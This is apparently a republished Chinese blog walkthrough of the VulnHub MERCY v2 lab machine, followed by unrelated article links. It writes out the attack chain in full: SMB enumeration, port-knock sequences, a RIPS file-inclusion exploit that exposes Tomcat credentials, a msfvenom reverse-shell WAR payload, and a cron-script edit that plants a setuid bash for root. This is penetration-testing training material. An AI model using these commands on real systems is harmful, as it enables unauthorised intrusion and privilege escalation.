vulnhub靶场之digitalworld.local: MERCY v2

vulnhub靶场之digitalworld.local: MERCY v2

article2024/11/24 20:59:09/文章来源:https://blog.csdn.net/qq_58091216/article/details/142962554

一.环境搭建

1.靶场描述

MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-)

MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box.

If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): Mercy is: (#1): what you always plead for but cannot get, (#2): a dubious machine, (#3): https://www.youtube.com/watch?v=c-5UnMdKg70

Note: Some report a kernel privilege escalation works on this machine. If it does, try harder! There is another vector that you should try!

Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.

## Changelog MERCY v2 - 2018-12-28 MERCY v1 - 2018-09-28

2.靶场下载

https://download.vulnhub.com/digitalworld/MERCY-v2.zip

3.靶场启动

二.信息收集

1.寻找靶场真实的ip地址

nmap -sP 192.168.14.0/24

arp-scan -l

我们知道靶场的真实IP为192.168.14.3

2.探测端口及服务

nmap -p- -sV 192.168.14.3

我们可以看到好多的端口，但是22端口和80端口没有开放

三.渗透测试

1.访问web服务

http://192.168.14.3:110

我们可以看到除了8080端口之外，其他端口页面报错。

http://192.168.14.3:8080

我们可以看到是一个默认的tomcat页面，我们进行扫描

2.扫描web服务

dirb http://192.168.14.3:8080

我们扫描到一个登录页面，一个robots.txt

3.渗透测试

1)访问robots.txt和manager

http://192.168.14.3:8080/robots.txt

我们进行访问，发现是一串base64编码，我们进行解密，然后翻译，最后发现一个密码是password

我们访问/manager/，发现是一个登录页面，但是我们不知道用户名和密码

所以这里我们的思路就断了，先把password放一放，我们在扫描端口的时候，扫描到了smb服务，我们使用enum4linux对目标smb服务进行枚举

2)smb服务

enum4linux -a 192.168.14.3

enum4linux 是一个用于枚举 Windows 和 Samba 系统上信息的工具，它可以帮助你发现目标系统的用户列表、组列表、共享信息以及其他一些有用的信息。这个工具特别适用于渗透测试和安全评估。

smbclient -NL 192.168.14.3

根据前面2个命令，我们可以看到用户名是qiu

我们前面找到密码是password,用户名是qiu,我们使用smbclient查看目标文件共享

smbclient -U qiu \\\\192.168.14.3\\qiu

使用用户名 qiu 连接到 IP 地址为 192.168.14.3的 SMB 服务器的 qiu 共享资源。

我们可以看到一个隐藏目录，可能用于存放私人或敏感的文件，我们进行查看

我们在kali里面查看

我们可以看到2个文件，我们进行查看

我们可以看到是一个敲门端口，我们前面找到22端口和80端口没有开启，这里我们使用knock命令开启22和80端口

3)敲门端口

我们使用命令开启22端口和80端口

knock 192.168.14.3 159 27391 4 -v

knock 192.168.14.3 17301 28504 9999 -v

我们再次查看端口，可以看到80端口及22端口开启了

4)访问80端口

http://192.168.14.3

好像没有什么用，我们进行扫描

dirb http://192.168.14.3

我们扫描到robots.txt,我们进行查看

http://192.168.14.3/nomercy/，我们可以看到是ripscms,我们进行漏洞利用

5)文件包含漏洞

我们在kali自带的漏洞里面查看

searchsploit rips 0.53

我们进行查看

我们可以看到poc，我们进行查看

存在文件包含漏洞

前面8080端口提示

我们就使用文件包含进行查看

我们看到用户名和密码，我们前面扫描出来一个登录页面，我们进行登录

6)tomcat登录

<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>

我们可以看到登录成功

7)文件上传

我们在下面可以看到一个文件上传页面，而且规定文件类型是war

那么我们就使用msf进行

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.14.4 lport=5555 -f war >MS02423.war

如何我们进行反弹shell

我们可以看到反弹成功

8)提权

使用python切换交互式shell：python -c 'import pty;pty.spawn("/bin/bash")'

ls -la

这些都没有什么用，前面文件包含我们可以看到2个用户名和密码，我们试试第二个用户名和密码

我们成功登录

我们在home目录下，看到一个定时任务，权限是777，那么我们就可以使用它进行提权，我们修改内容

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' >> timeclock

我们可以看到成功提权

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/892142.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

快速排序-加餐

快速排序-加餐

1.快排性能的关键点分析决定快排性能的关键点是每次单趟排序后，key对数组的分割，如果每次选的key基本都二分居中，那么快排的递归树就是一棵均匀的满二叉树，性能达到最佳。但是在实践中虽然不可能每次都是二分居中，…

阅读更多...

[CTF夺旗赛] CTFshow Web13-14 详细过程保姆级教程~

[CTF夺旗赛] CTFshow Web13-14 详细过程保姆级教程~

前言 CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解题思路的在线社区或软件。参与者会在比赛中收集“flag”，通常是隐藏在网络环境中的数据或密码形…

阅读更多...

面向对象--继承

面向对象--继承

文章目录 1. 继承概念及定义：继承的定义：继承关系和访问限定符：继承基类成员访问方式的变化 （在派生类中访问方式） 2. 基类和派生类对象赋值转换3 .继承中的作用域4. 派生类的默认成员函数5. 继承与友元6. 继承与静态成…

阅读更多...

《Python爬虫逆向实战》内存漫游

《Python爬虫逆向实战》内存漫游

所谓内存漫游，就是说我们可以在浏览器内存中随意检索任何想要的数据。在JS逆向过程中，最麻烦和最浪费时间的步骤就是跟值。本篇文章介绍内存漫游工具能够帮助我们快速定位某个加密值的生成位置，即可以直接搜索变量的值(value)，而不…

阅读更多...

【Linux】Linux进程基础

【Linux】Linux进程基础

1.进程介绍与概念进程的本质是在计算机内存中运⾏的程序，但是这⼀个概念太过于⼴泛每个应用程序运行于现代操作系统之上时，操作系统会提供一种抽象，好像系统上只有这个程序在运行，所有的硬件资源都被这个程序在使用。这种假象…

阅读更多...

jenkins 插件Publish Over SSH (sskey) 同步文件夹

jenkins 插件Publish Over SSH (sskey) 同步文件夹

一、安装插件 Publish Over SSH SSH Pipeline Steps 二、添加sshkey 将ssh免密登录的私钥新建到二、准备目录源：images 目标：/root/images2 流水线脚本 pipeline {agent anystages {stage(Dest) {steps {script{def remote [:]remote.name tstr…

阅读更多...

Go 语言应用开发：从入门到实战

Go 语言应用开发：从入门到实战

Go 语言应用开发：从入门到实战引言 Go（Golang）是由 Google 开发的一种开源编程语言，设计初衷是提高编程效率，尤其是在高并发场景下表现出色。Go 语言以其简洁、易学、高效并发的特性，逐渐成为开发者的首…

阅读更多...

【LeetCode每日一题】——1588.所有奇数长度子数组的和

【LeetCode每日一题】——1588.所有奇数长度子数组的和

文章目录一【题目类别】二【题目难度】三【题目编号】四【题目描述】五【题目示例】六【题目提示】七【题目进阶】八【解题思路】九【时间频度】十【代码实现】十一【提交结果】一【题目类别】前缀和二【题目难度】简单三【题目编号】 1588.所有奇数长度子数组的和 …

阅读更多...

【fisco学习记录】搭建第一个单群组联盟链

【fisco学习记录】搭建第一个单群组联盟链

前提：操作系统Windows11，安装wsl：Windows11安装wsl并迁移记录_adduser: please enter a username matching the regu-CSDN博客一、安装依赖安装ubuntu依赖 sudo apt install -y openssl curl 二、创建操作目录, 下载安装脚本 ## 创建操…

阅读更多...

一文介绍SQL标准1986~2023的演变

一文介绍SQL标准1986~2023的演变

SQL标准1986年制定第一版，到最新的2023版，已经有38年的历史，现在依然是计算机非常活跃的语言，50%的程序员都能掌握SQL，数据分析师也是SQL的主要使用人员之一。从早期的基本语法，到融合了XML、JSON等复杂数…

阅读更多...

Qt- JSONXML

Qt- JSONXML

1. JSON概述 JSON（JavaScript Object Notation, JS 对象简谱）是一种轻量级的数据交换格式。 JSON 采用 key-value 的结构来组织和管理数据。 JSON 支持的数据类型： 数值型、字符串、布尔值、数组、对象等 JSON 来源于 JavaScript JSON应用…

阅读更多...

UE5模型导入面板解读

UE5模型导入面板解读

1.Skeletal Mesh： 是一个可以让模型动起来的选项，适用于需要动画的角色或生物。是否勾选：如果导入的是一个需要动画的角色或生物，就勾选 Skeletal Mesh 选项；如果是静态物体，就不勾选。 2.Build Nanite&a…

阅读更多...

【在Linux世界中追寻伟大的One Piece】Jsoncpp|序列化

【在Linux世界中追寻伟大的One Piece】Jsoncpp|序列化

目录 1 -> Jsoncpp 1.1 -> 特性 1.2 -> 安装 2 -> 序列化 3 -> 反序列化 4 -> Json::Value 1 -> Jsoncpp Jsoncpp是一个用于处理JSON数据的C库。它提供了将JSON数据序列化为字符串以及从字符串反序列化为C数据结构的功能。Jsoncpp是开源的&#xf…

阅读更多...

Ubuntu20.04安装ROS2教程

Ubuntu20.04安装ROS2教程

Ubuntu20.04安装ROS2教程 ROS 2 安装指南支持的ROS 2 版本设置语言环境（Set locale）设置源（Setup Sources）设置密钥安装 ROS 2 包（Install ROS 2 packages）环境设置（Environment setup&#xff…

阅读更多...

拟声 0.37.0 | 拟物风格，超级优美，功能丰富

拟声 0.37.0 | 拟物风格，超级优美，功能丰富

拟声是一款功能丰富的音视频播放器，支持多种音频来源，并具备独特的歌词弹幕、音源转换、跨设备共享与控制等功能。其创新的LRC歌词编解码器和新拟物风格的UI设计为用户提供了一个全新的视听体验。大小：36M 百度网盘：https://pan…

阅读更多...

第三届OpenHarmony技术大会在上海成功举办

第三届OpenHarmony技术大会在上海成功举办

10月12日，以“技术引领筑生态，万物智联创未来”为主题的第三届OpenHarmony技术大会（以下简称“大会”）在上海成功举办。本次大会由OpenAtom OpenHarmony（以下简称“OpenHarmony”）项目群技术指导委员会&…

阅读更多...

【Mac苹果电脑安装】DBeaverEE for Mac 数据库管理工具软件教程【保姆级教程】

【Mac苹果电脑安装】DBeaverEE for Mac 数据库管理工具软件教程【保姆级教程】

Mac分享吧文章目录 DBeaverEE 数据库管理工具软件安装完成，打开效果图片Mac电脑 DBeaverEE 数据库管理工具软件安装——v24.21️⃣：下载软件2️⃣：安装JDK，根据下图操作步骤提示完成安装3️⃣：安装DBeaverEE&#…

阅读更多...

如何进行数据库缩容 | OceanBase应用实践

如何进行数据库缩容 | OceanBase应用实践

作者：关炳文，爱可生 DBA 团队成员，负责数据库相关技术支持。本文详细介绍了OceanBase V3.2版的集群中，面对数据文件缩容的场景的一套缩容方案，作为大家的参考。缩容场景某银行运行的一套采用1-1-1架构的OceanBase…

阅读更多...

软件架构师 PV

软件架构师 PV

PV操作与生产者消费者问题是操作系统中进程管理和同步机制的重要概念。以下是对PV操作以及生产者消费者问题的详细解释： 一、PV操作 PV操作由P操作原语和V操作原语组成，这两个原语是不可中断的过程，它们对信号量进行操作。 P操作&#xff…

阅读更多...

首发 | 数据通解决方案：打造数据工程能力，驱动数据价值转化

首发 | 数据通解决方案：打造数据工程能力，驱动数据价值转化

数据已经成为企业竞争的核心资源。企业要想从海量数据资源中挖掘数据价值并促进价值转换，需要有全新的工程化方法对数据要素资源进行全生命周期管理。数据工程是一套完整的实现从数据资源到企业价值的系统工程，旨在通过系统性技术与方法，将…

阅读更多...

最新文章